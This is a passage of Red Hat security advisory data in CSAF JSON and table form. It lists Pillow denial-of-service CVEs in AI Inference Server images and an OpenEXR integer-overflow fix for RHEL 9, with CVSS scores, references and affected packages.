"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
},
{
"cve": "CVE-2026-40192",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-04-16T00:00:49.590876+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2458856"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "RHBZ#2458856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
"url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9521",
"url": "https://github.com/python-pillow/Pillow/pull/9521"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
},
{
"category": "external",
"summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
"url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
}
],
"release_date": "2026-04-15T22:53:56.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
},
{
"cve": "CVE-2026-42309",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-05-09T06:01:11.401932+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468458"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via specially crafted coordinate input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact vulnerability in the Pillow Python imaging library could lead to a denial of service. Applications processing untrusted image data that utilize specific Pillow APIs, such as `ImagePath.Path`, `ImageDraw.ImageDraw.polygon`, or `ImageDraw.ImageDraw.line`, with specially crafted nested list coordinates are susceptible to a heap buffer overflow.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "RHBZ#2468458",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468458"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42309",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42309"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2"
}
],
"release_date": "2026-05-09T04:08:10.517000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via specially crafted coordinate input"
},
{
"cve": "CVE-2026-42310",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-05-09T06:01:21.465052+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468461"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via malicious PDF processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "RHBZ#2468461",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468461"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42310",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42310"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468",
"url": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9519",
"url": "https://github.com/python-pillow/Pillow/pull/9519"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7"
}
],
"release_date": "2026-05-09T04:10:48.395000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T15:49:50+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16030",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:3aecb1fcf7c282681d9a83ec51fd2fa2ff078567603942466734f55c8294961c_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:e3c8beb04bd3aa3c14ed0fd1e1bb92cfb697d414b4cb1d537e4d508ca2da60a7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via malicious PDF processing"
}
]
}
RHSA-2026:8888
Vulnerability from csaf_redhat - Published: 2026-04-20 03:46 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8888",
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8888.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:33+00:00",
"generator": {
"date": "2026-05-14T22:36:33+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8888",
"initial_release_date": "2026-04-20T03:46:39+00:00",
"revision_history": [
{
"date": "2026-04-20T03:46:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T03:46:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:33+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_7.1.src",
"product": {
"name": "openexr-0:3.1.1-3.el9_7.1.src",
"product_id": "openexr-0:3.1.1-3.el9_7.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_7.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-3.el9_7.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-3.el9_7.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-3.el9_7.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-3.el9_7.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-3.el9_7.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"product": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"product_id": "openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"product_identification_helper": {
